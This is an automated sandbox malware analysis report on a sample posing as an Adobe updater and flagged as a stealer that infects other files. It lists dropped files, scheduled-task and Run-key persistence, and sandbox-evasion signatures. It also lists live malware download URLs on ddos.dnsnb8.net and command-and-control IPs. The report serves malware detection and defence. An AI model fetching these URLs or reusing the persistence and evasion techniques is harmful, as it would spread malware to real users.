            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480703 Sample: AdobeUpdaterV131.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 8 other signatures 2->67 9 AdobeUpdaterV131.exe 1 10 2->9         started        14 RageMP131.exe 2 2->14         started        16 MPGPH131.exe 2 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 59 193.233.132.62, 49732, 49737, 49738 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\Temp\xRp.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 9->79 81 Tries to evade debugger and weak emulator (self modifying code) 9->81 83 Tries to detect virtualization through RDTSC time measurements 9->83 20 xRp.exe 34 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        85 Antivirus detection for dropped file 14->85 87 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->87 89 Machine Learning detection for dropped file 14->89 91 Hides threads from debuggers 16->91 93 Potentially malicious time measurement code found 16->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->97 29 xRp.exe 1 26 18->29         started        file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49730, 49731, 49748 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Detected unpacking (changes PE section rights) 20->71 73 Machine Learning detection for dropped file 20->73 75 Infects executable files (exe, dll, sys, html) 20->75 31 WerFault.exe 21 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            AdobeUpdaterV131.exe100%AviraW32/Jadtre.B
            AdobeUpdaterV131.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
            C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\xRp.exe100%AviraTR/Dldr.Small.Z.haljq
            C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\xRp.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.scintilla.org/scite.rng0%URL Reputationsafe
            http://www.activestate.comHolger0%URL Reputationsafe
            http://www.baanboard.comBrendon0%URL Reputationsafe
            https://www.smartsharesystems.com/0%URL Reputationsafe
            http://www.scintilla.org0%URL Reputationsafe
            http://www.develop.com0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
            http://www.spaceblue.com0%URL Reputationsafe
            http://www.baanboard.com0%URL Reputationsafe
            http://www.develop.comDeepak0%URL Reputationsafe
            http://www.rftp.comJosiah0%URL Reputationsafe
            http://www.activestate.com0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            http://www.rftp.com0%URL Reputationsafe
            http://www.spaceblue.comMathias0%URL Reputationsafe
            https://www.smartsharesystems.com/Morten0%URL Reputationsafe
            http://www.lua.org0%URL Reputationsafe
            http://ddos.dnsnb8.net/100%URL Reputationmalware
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k3.rar100%Avira URL Cloudphishing
            https://t.me/RiseProSUPPORTFs0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rarUa100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rar8100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rarsC:100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarcC:100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.raryY100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m100%Avira URL Cloudmalware
            https://t.me/RiseProSUPPORTF/0%Avira URL Cloudsafe
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k1.rar7100%Avira URL Cloudphishing
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k5.rar?Y100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net/v100%Avira URL Cloudmalware
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k4.rar)X100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarcag$100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rar1b100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k2.rarq100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarU100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k2.rars100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rarsC:100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rarhg100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rar100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarMp100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k5.rarC:100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            ddos.dnsnb8.net
            44.221.84.105
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k3.rartrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rartrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarfalse
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarfalse
              • Avira URL Cloud: phishing
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k1.rarUaxRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              https://t.me/RiseProSUPPORTFsMPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://www.activestate.comHolgerSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarsxRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarC:xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.baanboard.comBrendonSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              https://www.smartsharesystems.com/SciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://www.scintilla.orgSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rar8xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarsC:xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              http://www.develop.comSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://www.spaceblue.comSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarcC:xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.baanboard.comSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.raryYxRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.develop.comDeepakSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k3.rarXY$$mxRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://t.me/RiseProSUPPORTF/RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rar?YxRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              http://www.rftp.comJosiahSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rar7xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.activestate.comSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DExRp.exe, 00000001.00000003.1658769932.0000000000520000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmp, xRp.exe, 0000000F.00000003.1890235266.0000000000B60000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dllAdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net/vxRp.exe, 00000001.00000002.1856041634.000000000090E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://upx.sf.netAmcache.hve.1.drfalse
              • URL Reputation: safe
              unknown
              http://www.rftp.comSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              https://t.me/RiseProSUPPORTAdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rar)XxRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarcag$xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarqxRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rar1bxRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$mxRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarsxRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.lua.orgSciTE.exe.1.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarsC:xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net/xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarUxRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarSxRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmptrue
                unknown
                http://ddos.dnsnb8.net:799/cj//k1.rarhgxRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://ddos.dnsnb8.net:799/cj//k2.rarMpxRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.winimage.com/zLibDllAdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpfalse
                • URL Reputation: safe
                unknown
                http://ddos.dnsnb8.net:799/cj//k5.rarC:xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                44.221.84.105
                ddos.dnsnb8.netUnited States
                14618AMAZON-AESUSfalse
                193.233.132.62
                unknownRussian Federation
                2895FREE-NET-ASFREEnetEUfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1480703
                Start date and time:2024-07-24 23:01:03 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 12m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:AdobeUpdaterV131.exe
                Detection:MAL
                Classification:mal100.spre.troj.evad.winEXE@27/29@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.189.173.21
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: AdobeUpdaterV131.exe
                TimeTypeDescription
                17:02:12API Interceptor1x Sleep call for process: WerFault.exe modified
                17:02:24API Interceptor3078580x Sleep call for process: AdobeUpdaterV131.exe modified
                17:02:31API Interceptor5532x Sleep call for process: MPGPH131.exe modified
                17:02:38API Interceptor4377186x Sleep call for process: RageMP131.exe modified
                22:01:59Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
                22:01:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                22:02:00Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
                22:02:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                44.221.84.105AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • ddos.dnsnb8.net:799/cj//k1.rar
                AIBIJIAO 12.exeGet hashmaliciousBdaejecBrowse
                • ddos.dnsnb8.net:799/cj//k3.rar
                ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exeGet hashmaliciousBdaejec, RedLineBrowse
                • ddos.dnsnb8.net:799/cj//k2.rar
                AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • ddos.dnsnb8.net:799/cj//k5.rar
                aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • ddos.dnsnb8.net:799/cj//k5.rar
                ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exeGet hashmaliciousBdaejecBrowse
                • ddos.dnsnb8.net:799/cj//k1.rar
                7Y18r(224).exeGet hashmaliciousBdaejecBrowse
                • ddos.dnsnb8.net:799/cj//k1.rar
                A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exeGet hashmaliciousBdaejec, RedLineBrowse
                • ddos.dnsnb8.net:799/cj//k4.rar
                A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • ddos.dnsnb8.net:799/cj//k5.rar
                A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • ddos.dnsnb8.net:799/cj//k1.rar
                193.233.132.62SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                SecuriteInfo.com.Win32.PWSX-gen.580.27252.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                9iz0QM9rMM.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                q7a5JOlhLZ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                7jv1U7CgKF.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                • 193.233.132.62:57893/hera/amadka.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ddos.dnsnb8.netAF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                AIBIJIAO 12.exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exeGet hashmaliciousBdaejec, RedLineBrowse
                • 44.221.84.105
                AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 44.221.84.105
                aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                7Y18r(224).exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exeGet hashmaliciousBdaejec, RedLineBrowse
                • 44.221.84.105
                A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 44.221.84.105
                A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AMAZON-AESUSAF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                AIBIJIAO 12.exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exeGet hashmaliciousBdaejec, RedLineBrowse
                • 44.221.84.105
                AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 44.221.84.105
                aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exeGet hashmaliciousBdaejec, RedLineBrowse
                • 44.221.84.105
                A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 44.221.84.105
                A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                • 44.221.84.105
                a405d01674721b014e2cb23e544e12c49fa27c7cc90e896b437ad813dbe440fb.exeGet hashmaliciousBdaejecBrowse
                • 44.221.84.105
                FREE-NET-ASFREEnetEUinstaller.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                • 147.45.47.81
                92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                • 147.45.93.156
                conhost.exeGet hashmaliciousXmrigBrowse
                • 147.45.47.81
                http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                • 147.45.78.74
                Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                • 147.45.47.81
                arm7.elfGet hashmaliciousMiraiBrowse
                • 147.45.45.222
                SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog StealerBrowse
                • 193.233.203.218
                SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                • 193.233.203.218
                https://jswebcloud.comGet hashmaliciousUnknownBrowse
                • 147.45.78.74
                https://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                • 147.45.78.74
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\xRp.exeAF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  AIBIJIAO 12.exeGet hashmaliciousBdaejecBrowse
                    ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exeGet hashmaliciousBdaejec, RedLineBrowse
